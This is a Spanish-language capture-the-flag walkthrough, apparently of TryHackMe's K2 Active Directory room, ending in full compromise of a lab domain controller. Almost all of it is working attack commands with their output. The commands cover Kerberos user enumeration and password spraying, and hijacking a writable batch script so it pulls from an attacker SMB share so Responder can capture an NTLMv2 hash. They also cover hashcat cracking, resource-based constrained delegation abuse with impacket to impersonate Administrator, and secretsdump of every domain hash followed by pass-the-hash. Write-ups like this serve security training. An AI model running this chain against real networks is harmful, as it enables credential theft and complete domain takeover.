🏔️K2 - 3/3 (AD)

With all of the information gathered, you will reach the very top and prove your skills.

Enumeración de Red

nmap

autoscan 10.10.140.240

Resultado nmap

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-13 08:27:39Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=K2RootDC.k2.thm
| Not valid before: 2025-08-12T08:22:55
|_Not valid after:  2026-02-11T08:22:55
| rdp-ntlm-info: 
|   Target_Name: K2
|   NetBIOS_Domain_Name: K2
|   NetBIOS_Computer_Name: K2ROOTDC
|   DNS_Domain_Name: k2.thm
|   DNS_Computer_Name: K2RootDC.k2.thm
|   DNS_Tree_Name: k2.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2025-08-13T08:28:28+00:00
|_ssl-date: 2025-08-13T08:29:08+00:00; +2s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?
9389/tcp  open  mc-nmf        .NET Message Framing
49668/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49714/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: K2ROOTDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Windows - Active Directory
DNS_Computer_Name: K2RootDC.k2.thm

Enumeración de Dominio

Username-anarchy

Generar lista con nombres anteriores

username-anarchy <names> >> users.txt

kerbrute userenum --dc 10.10.140.240 -d k2.thm users.txt

[+] VALID USERNAME: [email protected]

Password Spraying - Credenciales Anteriores

crackmapexec smb 10.10.140.240 -u j.smith -p ../passes.txt

[+] j.smith:vz0q$i8b4c

Probar sesión remota

netexec winrm K2RootDC.k2.thm -u j.smith -p 'vz0q$i8b4c'

[+] k2.thm\j.smith:vz0q$i8b4c (Pwn3d!)

Iniciar sesión remota de windows

evil-winrm -i 10.10.140.240 -u j.smith -p 'vz0q$i8b4c'

Intrusión en el Sistema

Sesión de Windows Remota: k2\j.smith

Enumeración Post-Intrusión

net users

j.smith, o.armstrong, administrator

C:\Scripts\backup.bat

copy C:\Users\o.armstrong\Desktop\notes.txt C:\Users\o.armstrong\Documents\backup_notes.txt

Comprobar permisos de binario

Get-Acl -Path "C:\Scripts\backup.bat"

owner: o.armstrong

Comprobar permisos de directorio

Get-Acl -Path "C:\Scripts"

j.smith: Full Control

Escalada de Privilegios: Binary Hijacking

Establecer Responder para escuchar conexiones

sudo responder -I tun0

Sustituir binario por copia maliciosa

rm backup.bat
Set-Content -Path "C:\Scripts\backup.bat" -Value 'copy \\10.8.107.26\share\notes.txt C:\Users\o.armstrong\Documents\backup_notes.txt'

Hash NTLM capturado

[SMB] NTLMv2-SSP Client   : 10.10.240.187
[SMB] NTLMv2-SSP Username : K2\o.armstrong
[SMB] NTLMv2-SSP Hash     : 
o.armstrong::K2:c01b6cb6c539f9db:FB37E185731AC2D8A17ED30C994D3387:01010000000000008078FBD7490CDC017F6C60D379261FF000000000020008004A0043005100350001001E00570049004E002D003100390048005000510051004E00520050004600470004003400570049004E002D003100390048005000510051004E0052005000460047002E004A004300510035002E004C004F00430041004C00030014004A004300510035002E004C004F00430041004C00050014004A004300510035002E004C004F00430041004C00070008008078FBD7490CDC01060004000200000008003000300000000000000000000000002100000A9D1A0CEDB4FC21CACDE12050E59154684D183B3F4CB848169D47FCA3DF9C6E0A001000000000000000000000000000000000000900200063006900660073002F00310030002E0038002E003100300037002E00320036000000000000000000

Crackear hash

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

o.armstrong:arMStronG08

Iniciar sesión remota

evil-winrm -i 10.10.240.187 -u o.armstrong -p 'arMStronG08'

Escalada de privilegios

Sesión remota de windows: o.armstrong

Enumeración Post-Escalada

whoami /groups

K2\IT Director

Enumeración Autenticada de Dominio - BloodHound

Recolección

bloodhound-python -u j.smith -p 'vz0q$i8b4c' -d k2.thm -ns 10.10.140.240 -c All --zip

Información BloodHound

[email protected] → MemberOf → IT [email protected] → GenericWrite → K2RootDC.k2.thm

Resource-Based Constrained Delegation

Escalada de Privilegios: TGT Impersonation via Resource-Based Constrained Delegation

Añadir cuenta de ordenador

impacket-addcomputer -computer-name 'UWU$' -computer-pass 'uwu123' -dc-host K2RootDC.k2.thm -domain-netbios k2.thm -dc-ip 10.10.240.187 'k2.thm/o.armstrong:arMStronG08'

[*] Successfully added machine account UWU$ with password uwu123.

Asignar permiso delegate

impacket-rbcd -delegate-from 'UWU$' -delegate-to 'K2RootDC$' -dc-ip 10.10.240.187 -action 'write' 'k2.thm/o.armstrong:arMStronG08'

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty [*] Delegation rights modified successfully! [*] UWU$ can now impersonate users on K2RootDC$ via S4U2Proxy [*] Accounts allowed to act on behalf of other identity: [*] UWU$ (S-1-5-21-1966530601-3185510712-10604624-1116)

Solicitar ticket kerberos

impacket-getST -spn 'cifs/K2RootDC.K2.THM' -impersonate 'Administrator' -dc-ip 10.10.240.187 'K2.THM/UWU$:uwu123'

[*] Saving ticket in Administrator@[email protected]

Hash dump

impacket-secretsdump 'k2.thm/[email protected]' -k -no-pass -dc-ip 10.10.240.187 -target-ip 10.10.240.187 -just-dc-ntlm

hashes

Administrator:500:aad3b435b51404eeaad3b435b51404ee:15ecc755a43d2e7c8001215609d94b90:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5dea71ff019233bdca7ec46510727632:::
j.smith:1111:aad3b435b51404eeaad3b435b51404ee:9545b61858c043477c350ae86c37b32f:::
o.armstrong:1113:aad3b435b51404eeaad3b435b51404ee:6cc089ba579e04d4f44a468b6ad1c409:::
K2ROOTDC$:1008:aad3b435b51404eeaad3b435b51404ee:2628068c1945e517bebafb7609bb8455:::
UWU$:1116:aad3b435b51404eeaad3b435b51404ee:36f7ff98444673c81378366722a8e42c:::

Iniciar sesión remota con hash

evil-winrm -i 10.10.240.187 -u Administrator -H '15ecc755a43d2e7c8001215609d94b90'

Compromiso del Sistema

Sesión Remota de Windows: Administrator

Última actualización hace 4 meses